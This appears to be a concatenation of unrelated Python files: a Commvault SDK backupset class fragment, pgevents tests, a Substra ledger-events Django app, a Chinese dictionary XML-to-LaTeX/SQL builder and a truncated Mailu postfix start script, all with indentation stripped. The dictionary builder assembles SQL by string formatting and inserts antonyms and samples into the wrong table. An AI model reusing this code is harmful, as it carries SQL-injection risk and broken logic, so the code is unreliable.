if "browseResult" in browse_response:
browse_result = browse_response['browseResult']
if 'dataResultSet' in browse_result:
result_set = browse_result['dataResultSet']
break
if not browse_result:
try:
message = response_json['browseResponses'][0]['messages'][0]
error_message = message['errorMessage']
o_str = exception_message
raise SDKException('Subclient', '102', o_str.format(error_message))
except KeyError:
return [], {}
if not result_set:
raise SDKException('Subclient', exception_code)
if not isinstance(result_set, list):
result_set = [result_set]
if 'all_versions' in options['operation']:
return self._process_browse_all_versions_response(result_set)
for result in result_set:
name = result.get('displayName')
snap_display_name = result.get('name')
if 'path' in result:
path = result['path']
else:
path = '\\'.join([options['path'], name])
if 'modificationTime' in result and int(result['modificationTime']) > 0:
mod_time = time.localtime(int(result['modificationTime']))
mod_time = time.strftime('%d/%m/%Y %H:%M:%S', mod_time)
else:
mod_time = None
if 'file' in result['flags']:
if result['flags']['file'] in (True, '1'):
file_or_folder = 'File'
else:
file_or_folder = 'Folder'
else:
file_or_folder = 'Folder'
if 'size' in result:
size = result['size']
else:
size = None
paths_dict[path] = {
'name': name,
'snap_display_name': snap_display_name,
'size': size,
'modified_time': mod_time,
'type': file_or_folder,
'advanced_data': result['advancedData']
}
paths.append(path)
return paths, paths_dict
else:
raise SDKException('Response', '102')
else:
raise SDKException('Response', '101', self._update_response_(response.text))
def _do_browse(self, options=None):
"""Performs a browse operation with the given options.
Args:
options (dict) -- dictionary of browse options
Returns:
list - List of only the file, folder paths from the browse response
dict - Dictionary of all the paths with additional metadata retrieved from browse
"""
if options is None:
options = {}
options = self._prepare_browse_options(options)
request_json = self._prepare_browse_json(options)
flag, response = self._cvpysdk_object.make_request('POST', self._BROWSE, request_json)
return self._process_browse_response(flag, response, options)
def update_properties(self, properties_dict):
"""Updates the backupset properties
Args:
properties_dict (dict) -- Backupset property dict which is to be updated
Returns:
None
Raises:
SDKException:
if failed to add
if response is empty
if response code is not as expected
**Note** self.properties can be used to get a deep copy of all the properties, modify the properties which you
need to change and use the update_properties method to set the properties
"""
request_json = {
"backupsetProperties": {},
"association": {
"entity": [
{
"clientName": self._client_object.client_name,
"backupsetName": self.backupset_name,
"instanceName": self._instance_object.instance_name,
"appName": self._agent_object.agent_name
}
]
}
}
request_json['backupsetProperties'].update(properties_dict)
status, _, error_string = self._process_update_reponse(request_json)
if not status:
raise SDKException(
'Backupset',
'102',
'Failed to update backupset property\nError: "{0}"'.format(error_string))
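# Usage sketch (hedged) of the pattern described in the note above; the property
# key modified here is only illustrative:
#
#   props = backupset.properties
#   props['commonBackupSet']['userDescription'] = 'updated via SDK'
#   backupset.update_properties(props)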
@property
def properties(self):
"""Returns the backupset properties"""
return copy.deepcopy(self._properties)
@property
def name(self):
"""Returns the Backupset display name"""
return self._properties["backupSetEntity"]["backupsetName"]
@property
def backupset_id(self):
"""Treats the backupset id as a read-only attribute."""
return self._backupset_id
@property
def backupset_name(self):
"""Treats the backupset name as a property of the Backupset class."""
return self._backupset_name
@property
def description(self):
"""Treats the backupset description as a property of the Backupset class."""
return self._description
@property
def is_default_backupset(self):
"""Treats the is default backupset as a read-only attribute."""
return self._is_default
@property
def is_on_demand_backupset(self):
"""Treats the is on demand backupset as a read-only attribute."""
return self._is_on_demand_backupset
@property
def plan(self):
"""Treats the backupset plan as a property of the Backupset class."""
return self._plan
@property
def guid(self):
"""Treats the backupset GUID as a property of the Backupset class."""
if self._properties.get('backupSetEntity'):
if self._properties['backupSetEntity'].get('backupsetGUID'):
return self._properties['backupSetEntity']['backupsetGUID']
raise SDKException('Backupset', '102', 'Backupset GUID not found')
raise SDKException('Backupset', '102', 'Backupset entity not found')
@backupset_name.setter
def backupset_name(self, value):
"""Sets the name of the backupset as the value provided as input.
Raises:
SDKException:
if failed to update the backupset name
if type of value input is not string
"""
if isinstance(value, basestring):
output = self._update(
backupset_name=value,
backupset_description=self.description,
default_backupset=self.is_default_backupset
)
if output[0]:
return
o_str = 'Failed to update the name of the backupset\nError: "{0}"'
raise SDKException('Backupset', '102', o_str.format(output[2]))
raise SDKException('Backupset', '102', 'Backupset name should be a string value')
@description.setter
def description(self, value):
"""Sets the description of the backupset as the value provided as input.
Raises:
SDKException:
if failed to update the backupset description
if type of value input is not string
if description cannot be modified for this backupset
"""
if self.description is not None:
if isinstance(value, basestring):
output = self._update(
backupset_name=self.backupset_name,
backupset_description=value,
default_backupset=self.is_default_backupset
)
if output[0]:
return
o_str = 'Failed to update the description of the backupset\nError: "{0}"'
raise SDKException('Backupset', '102', o_str.format(output[2]))
raise SDKException(
'Backupset', '102', 'Backupset description should be a string value'
)
raise SDKException('Backupset', '102', 'Description cannot be modified')
@plan.setter
def plan(self, value):
"""Associates the plan to the backupset
Args:
value (object) -- the Plan object which is to be associated
with the backupset
value (str) -- name of the plan which is to be associated
with the backupset
value (None) -- set value to None to remove plan associations
Raises:
SDKException:
if plan does not exist
if plan association fails
if plan is not eligible to be associated
"""
from .plan import Plan
if isinstance(value, Plan):
plan_obj = value
elif isinstance(value, basestring):
plan_obj = self._commcell_object.plans.get(value)
elif value is None:
plan_obj = {
'planName': None
}
else:
raise SDKException('Backupset', '102', 'Input value is not of supported type')
plans_obj = self._commcell_object.plans
entity_dict = {
'clientId': int(self._client_object.client_id),
'appId': int(self._agent_object.agent_id),
'backupsetId': int(self.backupset_id)
}
if value is not None and plan_obj.plan_name in plans_obj.get_eligible_plans(entity_dict):
request_json = {
'backupsetProperties': {
'planEntity': {
'planSubtype': int(plan_obj.subtype),
'_type_': 158,
'planType': int(plan_obj.plan_type),
'planName': plan_obj.plan_name,
'planId': int(plan_obj.plan_id)
}
}
}
response = self._process_update_reponse(
request_json
)
if response[0]:
return
else:
o_str = 'Failed to associate plan with the backupset\nError: "{0}"'
raise SDKException('Backupset', '102', o_str.format(response[2]))
elif value is None:
request_json = {
'backupsetProperties': {
'removePlanAssociation': True
}
}
response = self._process_update_reponse(
request_json
)
if response[0]:
return
else:
o_str = 'Failed to dissociate plan from backupset\nError: "{0}"'
raise SDKException('Backupset', '102', o_str.format(response[2]))
else:
raise SDKException(
'Backupset',
'102',
'Plan not eligible to be associated with the backupset'
)
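# Usage sketch (hedged): the plan name is illustrative; the plan must be eligible
# for the backupset entity, otherwise an SDKException is raised.
#
#   backupset.plan = 'server-plan'   # associate by plan name (or pass a Plan object)
#   backupset.plan = None            # remove the plan association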
def set_default_backupset(self):
"""Sets the backupset represented by this Backupset class instance as the default backupset
if it is not the default backupset.
Raises:
SDKException:
if failed to set this as the default backupset
"""
if self.is_default_backupset is False:
output = self._update(
backupset_name=self.backupset_name,
backupset_description=self.description,
default_backupset=True
)
if output[0]:
return
o_str = 'Failed to set this as the Default Backup Set\nError: "{0}"'
raise SDKException('Backupset', '102', o_str.format(output[2]))
def backup(self):
"""Runs Incremental backup job for all subclients in this backupset.
Runs a Full Backup job for a subclient if no job has been run for it earlier.
Returns:
list - list consisting of the job objects for the backup jobs started for
the subclients in the backupset
"""
return_list = []
thread_list = []
if self.subclients.all_subclients:
for subclient in self.subclients.all_subclients:
thread = threading.Thread(
target=self._run_backup, args=(subclient, return_list)
)
thread_list.append(thread)
thread.start()
for thread in thread_list:
thread.join()
return return_list
def browse(self, *args, **kwargs):
"""Browses the content of the Backupset.
Args:
Dictionary of browse options:
Example:
browse({
'path': 'c:\\\\hello',
'show_deleted': True,
'from_time': '2014-04-20 12:00:00',
'to_time': '2016-04-21 12:00:00'
})
Kwargs:
Keyword argument of browse options:
Example:
browse(
path='c:\\hello',
show_deleted=True,
from_time='2014-04-20 12:00:00',
to_time='2016-04-21 12:00:00'
)
Returns:
(list, dict)
list - List of only the file, folder paths from the browse response
dict - Dictionary of all the paths with additional metadata retrieved
from browse operation
Refer `default_browse_options`_ for all the supported options.
.. _default_browse_options: https://github.com/CommvaultEngg/cvpysdk/blob/master/cvpysdk/backupset.py#L565
"""
if args and isinstance(args[0], dict):
options = args[0]
else:
options = kwargs
options['operation'] = 'browse'
return self._do_browse(options)
def find(self, *args, **kwargs):
"""Searches a file/folder in the backed up content of the backupset,
and returns all the files matching the filters given.
Args:
Dictionary of browse options:
Example:
find({
'file_name': '*.txt',
'show_deleted': True,
'from_time': '2014-04-20 12:00:00',
'to_time': '2016-04-30 12:00:00'
})
Kwargs:
Keyword argument of browse options:
Example:
find(
file_name='*.txt',
show_deleted=True,
from_time='2014-04-20 12:00:00',
to_time='2016-04-30 12:00:00'
)
Returns:
(list, dict)
list - List of only the file, folder paths from the browse response
dict - Dictionary of all the paths with additional metadata retrieved
from browse operation
Refer `default_browse_options`_ for all the supported options.
Additional options supported:
file_name (str) -- Find files with name
file_size_gt (int) -- Find files with size greater than size
file_size_lt (int) -- Find files with size lesser than size
file_size_et (int) -- Find files with size equal to size
.. _default_browse_options: https://github.com/CommvaultEngg/cvpysdk/blob/master/cvpysdk/backupset.py#L565
"""
if args and isinstance(args[0], dict):
options = args[0]
else:
options = kwargs
options['operation'] = 'find'
if 'path' not in options:
options['path'] = '\\**\\*'
if 'filters' not in options:
options['filters'] = []
if 'file_name' in options:
options['filters'].append(('FileName', options['file_name']))
if 'file_size_gt' in options:
options['filters'].append(('FileSize', options['file_size_gt'], 'GTE'))
if 'file_size_lt' in options:
options['filters'].append(('FileSize', options['file_size_lt'], 'LTE'))
if 'file_size_et' in options:
# 'EQUALS' is assumed to be the equality operator expected by the server
options['filters'].append(('FileSize', options['file_size_et'], 'EQUALS'))
return self._do_browse(options)
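# Usage sketch (hedged): combines the name and size filters documented above;
# the threshold value is illustrative.
#
#   paths, metadata = backupset.find(file_name='*.log',
#                                    file_size_gt=1024,
#                                    show_deleted=True)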
def delete_data(self, paths):
"""Deletes items for the backupset in the Index and makes them unavailable for
browsing and recovery
Args:
paths (str/list) -- The list of paths or single path to delete
from the backupset
Returns:
None -- If delete request is sent successfully
Raises:
Exception, if unable to prepare, response is invalid or send the
delete data request
"""
options = {
'operation': 'delete_data',
'path': paths
}
files, _ = self._do_browse(options)
# Delete operation does not return any result, hence consider the operation successful
if files:
raise SDKException('Backupset', '102', 'Delete data operation gave unexpected results')
def refresh(self):
"""Refresh the properties of the Backupset."""
self._get_backupset_properties()
self.subclients = Subclients(self)
self.schedules = Schedules(self)
|
test_data_access.py
|
import time
from datetime import timedelta
from threading import Thread
import pytest
from pgevents import data_access, constants
from pgevents.event import Event
from pgevents.utils import timestamps
from tests.integration import DSN
@pytest.fixture(autouse=True)
def clear_events():
connection = data_access.connect(DSN)
with data_access.cursor(connection) as cursor:
data_access.truncate_events(cursor)
def test_listen_notify_unlisten():
connection = data_access.connect(DSN)
channel = "foo"
with data_access.cursor(connection) as cursor:
data_access.listen(cursor, channel)
with data_access.cursor(connection) as cursor:
data_access.notify(cursor, channel)
connection.poll()
assert connection.notifies
while connection.notifies:
connection.notifies.pop()
with data_access.cursor(connection) as cursor:
data_access.unlisten(cursor, channel)
with data_access.cursor(connection) as cursor:
data_access.notify(cursor, channel)
connection.poll()
assert not connection.notifies
def test_create_and_get_event_without_payload():
connection = data_access.connect(DSN)
event = Event(topic="foo")
with data_access.cursor(connection) as cursor:
created = data_access.create_event(cursor, event)
with data_access.cursor(connection) as cursor:
retrieved = data_access.get_event_by_id(cursor, created.id)
assert created == retrieved
assert created.status == constants.PENDING
@pytest.mark.parametrize(
["payload"],
[[None], [True], ["Hello world"], [1], [[0, 1, 2]], [dict(hello=[0, 1])]],
)
def test_create_and_get_event_with_payload(payload):
connection = data_access.connect(DSN)
event = Event(topic="foo", payload=payload)
with data_access.cursor(connection) as cursor:
created = data_access.create_event(cursor, event)
with data_access.cursor(connection) as cursor:
retrieved = data_access.get_event_by_id(cursor, created.id)
assert retrieved.payload == payload
def test_create_and_get_event_with_process_after():
connection = data_access.connect(DSN)
event = Event(topic="foo", process_after=timestamps.now() + timedelta(seconds=10))
with data_access.cursor(connection) as cursor:
created = data_access.create_event(cursor, event)
with data_access.cursor(connection) as cursor:
retrieved = data_access.get_event_by_id(cursor, created.id)
assert retrieved.process_after == event.process_after
@pytest.mark.parametrize(
[
"first_process_after",
"second_process_after",
"expected_first_status",
"expected_second_status",
],
[
[None, None, constants.PROCESSED, constants.PROCESSED,],
[
timestamps.now() + timedelta(seconds=10),
None,
constants.PENDING,
constants.PROCESSED,
],
],
)
def test_get_next_event(
first_process_after,
second_process_after,
expected_first_status,
expected_second_status,
):
connection = data_access.connect(DSN)
topic = "foo"
with data_access.cursor(connection) as cursor:
first = data_access.create_event(
cursor, Event(topic=topic, process_after=first_process_after)
)
second = data_access.create_event(
cursor, Event(topic=topic, process_after=second_process_after)
)
time.sleep(0.1)
def slow_running():
local_connection = data_access.connect(DSN)
with data_access.cursor(local_connection) as cursor:
event = data_access.get_next_event(cursor, [topic])
time.sleep(0.5)
if event:
data_access.mark_event_processed(cursor, event.id)
def fast_running():
local_connection = data_access.connect(DSN)
with data_access.cursor(local_connection) as cursor:
event = data_access.get_next_event(cursor, [topic])
if event:
data_access.mark_event_processed(cursor, event.id)
slow_thread = Thread(target=slow_running)
slow_thread.start()
time.sleep(0.1)
fast_thread = Thread(target=fast_running)
fast_thread.start()
slow_thread.join()
fast_thread.join()
with data_access.cursor(connection) as cursor:
retrieved_first = data_access.get_event_by_id(cursor, first.id)
assert retrieved_first.status == expected_first_status
with data_access.cursor(connection) as cursor:
retrieved_second = data_access.get_event_by_id(cursor, second.id)
assert retrieved_second.status == expected_second_status
def test_mark_event_processed():
connection = data_access.connect(DSN)
event = Event(topic="foo")
with data_access.cursor(connection) as cursor:
created = data_access.create_event(cursor, event)
assert created.status == constants.PENDING
assert created.processed_at is None
with data_access.cursor(connection) as cursor:
data_access.mark_event_processed(cursor, created.id)
with data_access.cursor(connection) as cursor:
retrieved = data_access.get_event_by_id(cursor, created.id)
assert retrieved.status == constants.PROCESSED
assert retrieved.processed_at is not None
|
apps.py
|
import asyncio
import json
import logging
import multiprocessing
import time
import contextlib
from django.apps import AppConfig
from django.conf import settings
import glob
from hfc.fabric import Client
from hfc.fabric.peer import Peer
from hfc.fabric.user import create_user
from hfc.util.keyvaluestore import FileKeyValueStore
from substrapp.tasks.tasks import prepare_tuple, on_compute_plan
from substrapp.utils import get_owner
from substrapp.ledger.connection import get_hfc, ledger_grpc_options
from celery.result import AsyncResult
logger = logging.getLogger(__name__)
@contextlib.contextmanager
def get_event_loop():
loop = asyncio.new_event_loop()
asyncio.set_event_loop(loop)
try:
yield loop
finally:
loop.close()
def tuple_get_worker(event_type, asset):
if event_type == 'aggregatetuple':
return asset['worker']
return asset['dataset']['worker']
def on_tuples_event(channel_name, block_number, tx_id, tx_status, event_type, asset):
owner = get_owner()
worker_queue = f"{settings.ORG_NAME}.worker"
key = asset['key']
status = asset['status']
if tx_status != 'VALID':
logger.error(
f'Failed transaction on task {key}: type={event_type}'
f' status={status} with tx status: {tx_status}')
return
logger.info(f'Processing task {key}: type={event_type} status={status}')
if status != 'todo':
return
if event_type is None:
return
tuple_owner = tuple_get_worker(event_type, asset)
if tuple_owner != owner:
logger.info(f'Skipping task {key}: owner does not match'
f' ({tuple_owner} vs {owner})')
return
if AsyncResult(key).state != 'PENDING':
logger.info(f'Skipping task {key}: already exists')
return
prepare_tuple.apply_async(
(channel_name, asset, event_type),
task_id=key,
queue=worker_queue
)
def on_compute_plan_event(channel_name, block_number, tx_id, tx_status, asset):
worker_queue = f"{settings.ORG_NAME}.worker"
key = asset['compute_plan_key']
# Currently, we receive this event on the done, failed and canceled statuses.
# We apply the same behavior for those three statuses.
# In the future, we can apply a conditional strategy based on the status.
status = asset['status']
if tx_status != 'VALID':
logger.error(
f'Failed transaction on cleaning task {key}: type=computePlan'
f' status={status} with tx status: {tx_status}')
return
logger.info(f'Processing cleaning task {key}: type=computePlan status={status}')
task_id = f'{key}_{tx_id}'
if AsyncResult(task_id).state != 'PENDING':
logger.info(f'Skipping cleaning task: already exists. '
f'Info: compute_plan={key}, block_number={block_number}, tx_id={tx_id}')
return
on_compute_plan.apply_async(
(channel_name, asset, ),
task_id=task_id,
queue=worker_queue
)
def on_event(channel_name, cc_event, block_number, tx_id, tx_status):
payload = json.loads(cc_event['payload'])
for event_type, assets in payload.items():
if not assets:
continue
for asset in assets:
if event_type == 'compute_plan':
on_compute_plan_event(channel_name, block_number, tx_id, tx_status, asset)
else:
on_tuples_event(channel_name, block_number, tx_id, tx_status, event_type, asset)
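# Illustrative chaincode event payload (hedged): only the keys read by the
# handlers above are shown; the event type names and values are assumptions.
#
#   {
#       "traintuple": [
#           {"key": "abc", "status": "todo", "dataset": {"worker": "MyOrgMSP"}}
#       ],
#       "compute_plan": [
#           {"compute_plan_key": "def", "status": "done"}
#       ]
#   }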
def wait(channel_name):
def on_channel_event(cc_event, block_number, tx_id, tx_status):
on_event(channel_name, cc_event, block_number, tx_id, tx_status)
with get_event_loop() as loop:
client = Client()
channel = client.new_channel(channel_name)
target_peer = Peer(name=settings.LEDGER_PEER_NAME)
target_peer.init_with_bundle({
'url': f'{settings.LEDGER_PEER_HOST}:{settings.LEDGER_PEER_PORT}',
'grpcOptions': ledger_grpc_options(settings.LEDGER_PEER_HOST),
'tlsCACerts': {'path': settings.LEDGER_PEER_TLS_CA_CERTS},
'clientKey': {'path': settings.LEDGER_PEER_TLS_CLIENT_KEY},
'clientCert': {'path': settings.LEDGER_PEER_TLS_CLIENT_CERT},
})
try:
# can fail
requestor = create_user(
name=f'{settings.LEDGER_USER_NAME}_events',
org=settings.ORG_NAME,
state_store=FileKeyValueStore(settings.LEDGER_CLIENT_STATE_STORE),
msp_id=settings.LEDGER_MSP_ID,
key_path=glob.glob(settings.LEDGER_CLIENT_KEY_PATH)[0],
cert_path=settings.LEDGER_CLIENT_CERT_PATH
)
except BaseException:
pass
else:
# Note:
# We loop when connecting to the channel event hub because grpc may disconnect and raise an exception.
# Since this runs inside a Django app of the backend, such an exception will not crash the server
# (once the "ready" method has already returned).
# That makes automatic reconnection difficult, because the server would otherwise have to be killed
# and restarted to re-establish the connection.
# So we catch the exception (RPC error) and retry connecting to the event hub.
while True:
# use chaincode event
channel_event_hub = channel.newChannelEventHub(target_peer,
requestor)
try:
# We want to replay blocks from the beginning (start=0) if channel event hub was disconnected during
# events emission
stream = channel_event_hub.connect(start=0,
filtered=False)
channel_event_hub.registerChaincodeEvent(
settings.LEDGER_CHANNELS[channel_name]['chaincode']['name'],
'chaincode-updates',
onEvent=on_channel_event)
logger.info(f'Connect to Channel Event Hub ({channel_name})')
loop.run_until_complete(stream)
except Exception as e:
logger.error(f'Channel Event Hub failed for {channel_name} ({type(e)}): {e} re-connecting in 5s')
time.sleep(5)
class EventsConfig(AppConfig):
name = 'events'
def listen_to_channel(self, channel_name):
# We try to connect a client first; if it fails, the backend will not start.
# This prevents potential issues when we launch the channel event hub in a subprocess.
while True:
try:
with get_hfc(channel_name) as (loop, client, user):
logger.info(f'Events: Connected to channel {channel_name}.')
except Exception as e:
logger.exception(e)
time.sleep(5)
logger.error(f'Events: Retry connecting to channel {channel_name}.')
else:
break
p1 = multiprocessing.Process(target=wait, args=[channel_name])
p1.start()
def ready(self):
for channel_name in settings.LEDGER_CHANNELS.keys():
self.listen_to_channel(channel_name)
|
hcl.py
|
# -*- coding: utf-8 -*-
import xml.etree.ElementTree as elemTree
import os, uuid
from operator import methodcaller, itemgetter, mul
from cihai.core import Cihai
c = Cihai()
import hms.tex as tex
import hms.html as html
import multiprocessing as mp
from multiprocessing import Process, Lock, Queue, Value
def generateIdent():
return str(uuid.uuid4())
def textify(e, spell, ident, coder=tex):
total = ''
part = e.text
beforehand = False
for child in e:
if part != None:
part = part.replace('.', '。').replace(',', ',').replace(' ', '').replace('\t', '').replace('\n', '').replace(' ', '')
if part != '':
total += part
beforehand = False
if child.tag == 'quote':
temp = textify(child, spell, ident, coder)
level = 1
if 'level' in child.attrib:
level = int(child.attrib['level'])
if level == 1:
total += '『{}』'.format(temp)
elif level >= 2:
total += '「{}」'.format(temp)
beforehand = False
elif child.tag == 'b':
total +=coder.bold(textify(child, spell, ident, coder))
beforehand = False
elif child.tag == 'self':
total +=coder.bold(spell)
beforehand = False
elif child.tag == 'ref':
ident = child.attrib['ident']
(tr, f) = search(ident)
root = tr.getroot()
num = 1
mspell = ''
if 'num' in root.attrib.keys():
num = int(root.attrib['num'])
for child0 in root:
if child0.tag == 'main-spell':
mspell = child0.text
total += coder.bold(mspell)
beforehand = False
elif child.tag == 'cite':
if beforehand:
if 'page' in child.attrib.keys():
total += "[][{}]{{{}}}".format(child.attrib['page'], child.attrib['src'])
else:
total += "{{{}}}".format(child.attrib['src'])
else:
if 'page' in child.attrib.keys():
total += "\\parencites[][{}]{{{}}}".format(child.attrib['page'], child.attrib['src'])
else:
total += "\\parencites{{{}}}".format(child.attrib['src'])
beforehand = True
part = child.tail
if part != None:
if part != '':
part = part.replace('.', '。').replace(',', ',').replace(' ', '').replace('\t', '').replace('\n', '').replace(' ', '')
total += part
beforehand = True
return total.strip()
def scandef(e, spell, ident, coder=tex):
synonyms = []
antonyms = []
samples = []
explanation = ''
if not('num' in e.attrib.keys()):
num = 1
else:
num = e.attrib['num']
if not('category' in e.attrib.keys()):
category = ''
else:
category = e.attrib['category']
for child in e:
if child.tag == 'exp':
explanation = textify(child, spell, ident, coder)
elif child.tag == 'samp':
if 'src' in child.attrib.keys():
source = child.attrib['src']
else:
source = ''
samples += [(source, textify(child, spell, ident, coder))]
elif child.tag == 'syn':
(temp, f) = search(child.attrib['ident'])
root = temp.getroot()
num0 = 1
mspell = ''
if 'num' in root.attrib.keys():
num0 = root.attrib['num']
for child0 in root:
if child0.tag == 'main-spell':
mspell = child0.text
synonyms += [(mspell, num0, child.attrib['ident'])]
elif child.tag == 'ant':
(temp, f) = search(child.attrib['ident'])
root = temp.getroot()
num0 = 1
mspell = ''
if 'num' in root.attrib.keys():
num0 = root.attrib['num']
for child0 in root:
if child0.tag == 'main-spell':
mspell = child0.text
antonyms += [(mspell, num0, child.attrib['ident'])]
return (num, category, synonyms, antonyms, samples, explanation)
def search(ident):
for (path, dir, files) in os.walk('entries'):
for filename in files:
p = '{}/{}'.format(path, filename)
if os.path.isfile(p):
ext = os.path.splitext(filename)[-1]
if ext == '.xml':
tree = elemTree.parse(p)
root = tree.getroot()
if 'ident' in root.attrib:
if root.attrib['ident'] == ident:
if root.tag == 'entry':
return (tree, p)
return None
def updatexml(path):
print(path)
tree = elemTree.parse(path)
root = tree.getroot()
if not('ident' in root.attrib.keys()):
root.set('ident', '{}'.format(generateIdent()))
tree.write(path)
if not('num' in root.attrib.keys()):
root.set('num', '1')
num = '1'
else:
num = root.attrib['num']
ident = root.attrib['ident']
if root.tag == 'entry':
for child in root:
if child.tag == 'def':
numx = child.attrib['num']
for child0 in child:
if child0.tag == 'syn':
ident0 = child0.attrib['ident']
num0 = child0.attrib['num']
(ref, f) = search(ident0)
for definition in ref.findall('def'):
if 'num' in definition.attrib.keys():
if definition.attrib['num'] == num0:
need = True
for child1 in definition:
if (child1.tag == 'syn') and (child1.attrib['ident'] == ident) and (child1.attrib['num'] == numx):
need = False
if need:
definition.append(elemTree.Element('syn', {'ident': ident, 'num': numx}))
ref.write(f, encoding='utf-8')
elif child0.tag == 'ant':
# keep the attribute values as strings, matching the 'syn' branch above
# (idents are UUID strings and 'num' is compared against string attributes)
ident0 = child0.attrib['ident']
num0 = child0.attrib['num']
(ref, f) = search(ident0)
for definition in ref.findall('def'):
if 'num' in definition.attrib.keys():
if definition.attrib['num'] == num0:
need = True
for child1 in definition:
if (child1.tag == 'ant') and (child1.attrib['ident'] == ident) and (child1.attrib['num'] == numx):
need = False
if need:
definition.append(elemTree.Element('ant', {'ident': ident, 'num': numx}))
ref.write(f, encoding='utf-8')
tree.write(path, encoding='utf-8')
def scanxml(tree):
root = tree.getroot()
num = root.attrib['num']
ident = root.attrib['ident']
alternative_spells = []
definitions= []
spell = ''
cites = ''
if root.tag == 'entry':
for child in root:
if child.tag == 'spell':
alternative_spells += [child.text.strip()]
elif child.tag == 'main-spell':
spell = child.text.strip()
elif child.tag == 'def':
definitions += [scandef(child, spell, ident)]
elif child.tag == 'cite':
source = child.attrib['src']
if 'page' in child.attrib.keys():
cites += "\\parencite[][{}]{{{}}}".format(child.attrib['page'], source)
else:
cites += "\\parencite{{{}}}".format(source)
return (root, num, spell, ident, alternative_spells, definitions, cites)
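# Illustrative entry file (hedged): reconstructed from the tags consumed by
# scanxml/scandef above; every attribute value and text node is a placeholder.
#
#   <entry ident="..." num="1">
#     <main-spell>...</main-spell>
#     <spell>...</spell>
#     <def num="1" category="...">
#       <exp>...</exp>
#       <samp src="...">...</samp>
#       <syn ident="..." num="1"/>
#       <ant ident="..." num="1"/>
#     </def>
#     <cite src="..." page="..."/>
#   </entry>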
def _spell(x):
global c
total = []
(root, num, spell, ident, alternative_spells, definitions, cites) = x
for ch in spell:
kangxi = c.unihan.lookup_char(ch).first().kRSKangXi.split('.')
total += [int(kangxi[0]), int(kangxi[1])]
return [total, int(num)]
def update():
for (path, dir, files) in os.walk('./'):
for filename in files:
p = '{}/{}'.format(path, filename)
ext = os.path.splitext(filename)[-1]
if ext == '.xml':
updatexml(p)
class entry:
def __init__(self, values):
self.values =values
def index_spell(self):
return _spell(self.values)
def _work(q, p):
try:
result = scanxml(elemTree.parse(p))
q.put(result)
except Exception as e:
print('An error occurred in {}: {}'.format(p, e))
def collect_entries(code=tex):
results = []
processes = []
for (path, dir, files) in os.walk('entries'):
for filename in files:
p = '{}/{}'.format(path, filename)
ext = os.path.splitext(filename)[-1]
if ext == '.xml':
q = mp.Queue()
proc = Process(target=_work, args=(q, p))
proc.start()
processes += [(q, proc)]
for x in processes:
(qr, p) = x
p.join()
results += [entry(qr.get())]
results.sort(key=methodcaller('index_spell'))
return results
def build_db(conn):
results = collect_entries(html)
conn.execute("DROP TABLE IF EXISTS _alternative_spells;")
conn.execute("DROP TABLE IF EXISTS _synonyms;")
conn.execute("DROP TABLE IF EXISTS _antonyms;")
conn.execute("DROP TABLE IF EXISTS _samples;")
conn.execute("DROP TABLE IF EXISTS _explanations;")
conn.execute("DROP TABLE IF EXISTS _words;")
conn.execute("CREATE TABLE _words(_spell TEXT, _ident BIGINT);")
conn.execute("CREATE TABLE _alternative_spells(_spell TEXT, _ident BIGINT);")
conn.execute("CREATE TABLE _explanations(_category TEXT, _exp TEXT, _ident BIGINT, _exp_ident BIGSERIAL PRIMARY KEY);")
conn.execute("CREATE TABLE _synonyms(_from BIGINT REFERENCES _explanations(_exp_ident), _dest BIGINT);")
conn.execute("CREATE TABLE _antonyms(_from BIGINT REFERENCES _explanations(_exp_ident), _dest BIGINT);")
conn.execute("CREATE TABLE _samples(_source TEXT, _sample TEXT, _exp BIGINT REFERENCES _explanations(_exp_ident));")
for result in results:
(root, num, spell, ident, alternative_spells, definitions, cites) = result.values
conn.execute('INSERT INTO _words(_spell, _ident) VALUES(\'{}\', {});'.format(spell, ident))
for sp in alternative_spells:
conn.execute("INSERT INTO _alternative_spells(_spell, _ident) VALUES(\'{}\', {});".format(spell, ident))
conn.commit()
definition_txt = ''
for d in sorted(definitions, key=itemgetter(0)):
(numx, category, synonyms, antonyms, samples, explanation) = d
exp_ident = 0
for row in conn.execute("INSERT INTO _explanations(_exp, _category, _ident) VALUES(\'{}\', \'{}\', {}) RETURNING _exp_ident;".format(explanation, category, ident)).fetchall():
                exp_ident = row['_exp_ident']
for synonym in synonyms:
conn.execute("INSERT INTO _synonyms(_from, _dest) VALUES ({}, {});".format(exp_ident, synonym[3]))
for antonym in antonyms:
conn.execute("INSERT INTO _synonyms(_from, _dest) VALUES ({}, {});".format(exp_ident, antonym[3]))
for sample in samples:
conn.execute("INSERT INTO _synonyms(_source, _sample, _exp) VALUES ({}, {});".format(sample[0], sample[1], exp_ident))
def build():
results = collect_entries(tex)
txt = ''
for result in results:
(root, num, spell, ident, alternative_spells, definitions, cites) = result.values
spells = ''
for sp in alternative_spells:
spells += '\\also{{{}}}'.format(sp)
definition_txt = ''
for d in sorted(definitions, key=itemgetter(0)):
(numx, category_txt, synonyms, antonyms, samples, explanation) = d
synonym_txt = ''
antonym_txt = ''
sample_txt = ''
for synonym in synonyms:
synonym_txt += "\\syn{{{}}}{{{}}}".format(synonym[0], synonym[1])
for antonym in antonyms:
antonym_txt += "\\ant{{{}}}{{{}}}".format(antonym[0], antonym[1])
for sample in samples:
sample_txt += '{}云『{}』'.format(sample[0], sample[1])
definition_txt += "\\explain{{{}}}{{{}{}{}{}}}".format(category_txt, explanation, synonym_txt, antonym_txt, sample_txt)
        txt += "\\entry{{{}}}{{{}}}{{{}{}{}}}{{{}}}".format(spell, num, spells, definition_txt, cites, '')
return txt
def initialize():
global c
if not c.unihan.is_bootstrapped:
c.unihan.bootstrap()
initialize()
|
start.py
|
#!/usr/bin/python3
import jinja2
import os
import socket
import glob
import shutil
import tenacity
import multiprocessing
from tenacity import retry
from podop import run_server
def start_podop():
os.setuid(100)
run_server(3 if "DEBUG" in os.environ else 0, "postfix", "/tmp/podop.socket", [
("transport", "url", "http://admin/internal/postfix/transport/§"),
("alias", "url", "http://admin/internal/postfix/alias/§"),
("domain", "url", "http://admin/internal/postfix/domain/§"),
("mailbox", "url", "http://admin/internal/postfix/mailbox/§"),
("sender", "url", "http://admin/internal/postfix/sender/§")
])
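# Each (table, "url", ...) tuple above registers a Postfix lookup table served
# over the podop socket; the trailing "§" is presumably the placeholder that
# Podop substitutes with the key Postfix asks to resolve (an assumption based
# on the URL pattern, not verified here).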
convert = lambda src, dst: open(dst, "w").write(jinja2.Template(open(src).read()).render(**os.environ))
# Actual startup script
resolve = retry(socket.gethostbyname, stop=tenacity.stop_after_attempt(100), wait=tenacity.wait_random(min=2, max=5))
